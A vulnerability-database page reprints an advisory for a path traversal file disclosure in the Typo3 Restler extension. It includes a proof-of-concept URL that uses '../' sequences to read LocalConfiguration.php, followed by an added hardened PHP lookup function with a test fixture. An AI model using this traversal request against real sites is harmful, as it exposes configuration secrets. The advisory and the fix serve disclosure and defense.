CVE | Category | Price | Severity |
---|---|---|---|
CVE-2014-9603 | CWE-22 | $500 | High |

Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Local | 2017-10-14 |

CVSS | EPSS | EPSSP |
---|---|---|
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | 0.02192 | 0.50148 |
```
# Exploit Title: Typo3 Restler Extension - Local File Disclosure
# Date: 2017-10-13
# Exploit Author: CrashBandicot @dosperl
# Vendor Homepage: https://www.aoe.com/
# Software Link: https://extensions.typo3.org/extension/restler/
# Tested on : MsWin
# Version: 1.7.0 (last)

# Vulnerability File : getsource.php

3.  $file = $_GET['file'];
13. $text = file_get_contents($file);
16. die($file . '<pre id="php">' . htmlspecialchars($text) . "</pre>");

# PoC :

# http://vuln.site/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php

# https://i.imgur.com/zObmaDD.png

# Timeline :

# Vulnerability identified
# Vendor notified
# CVE number requested
# Exploit released
```
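A hardened form of the lookup on lines 3 and 13 of getsource.php, as an added example that is not part of the advisory or of Restler's own code: the requested name is canonicalised and must stay inside a fixed examples directory before anything is read. The function name `resolve_example_path`, the `ALLOWED_EXT` list and the temporary fixture directory are assumptions made for illustration.

```php
<?php
// Added example, not Restler's code. The root directory and the
// extension allowlist are assumptions chosen for illustration.
const ALLOWED_EXT = ['php', 'html', 'js', 'css'];

// Return the canonical path of $requested if it lies under $root, else null.
function resolve_example_path(string $root, string $requested): ?string
{
    // Refuse empty values, NUL bytes and stream wrappers (php://, http://, ...).
    if ($requested === '' || strpos($requested, "\0") !== false
        || preg_match('#^[a-z][a-z0-9+.-]*://#i', $requested)) {
        return null;
    }
    $base = realpath($root);
    if ($base === false) {
        return null;
    }
    // realpath() collapses "../" and follows symlinks; false if nothing is there.
    $real = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($real === false || !is_file($real)) {
        return null;
    }
    // Containment check on the canonical path, with a trailing separator so
    // that "/srv/examples-old" does not pass for "/srv/examples".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    $ext = strtolower(pathinfo($real, PATHINFO_EXTENSION));
    return in_array($ext, ALLOWED_EXT, true) ? $real : null;
}

// Constructed fixture: an examples tree with a config file one level above it.
$top = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'getsource_demo_' . getmypid();
$root = $top . DIRECTORY_SEPARATOR . 'examples';
mkdir($root, 0700, true);
file_put_contents($root . '/index.php', "<?php echo 'example';\n");
file_put_contents($top . '/LocalConfiguration.php', "<?php // constructed secret\n");

foreach (['index.php', '../LocalConfiguration.php', 'http://example.test/x.php'] as $f) {
    $path = resolve_example_path($root, $f);
    echo str_pad($f, 34), $path === null ? "rejected\n" : "served: $path\n";
}

// Clean up the fixture.
unlink($root . '/index.php');
unlink($top . '/LocalConfiguration.php');
rmdir($root);
rmdir($top);
```

Only `index.php` resolves; the other two requests return null before `file_get_contents()` would be reached. Keeping the vendor `public/examples` directory out of the deployed web root removes the endpoint altogether.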
Copyright ©2024 Exploitalert.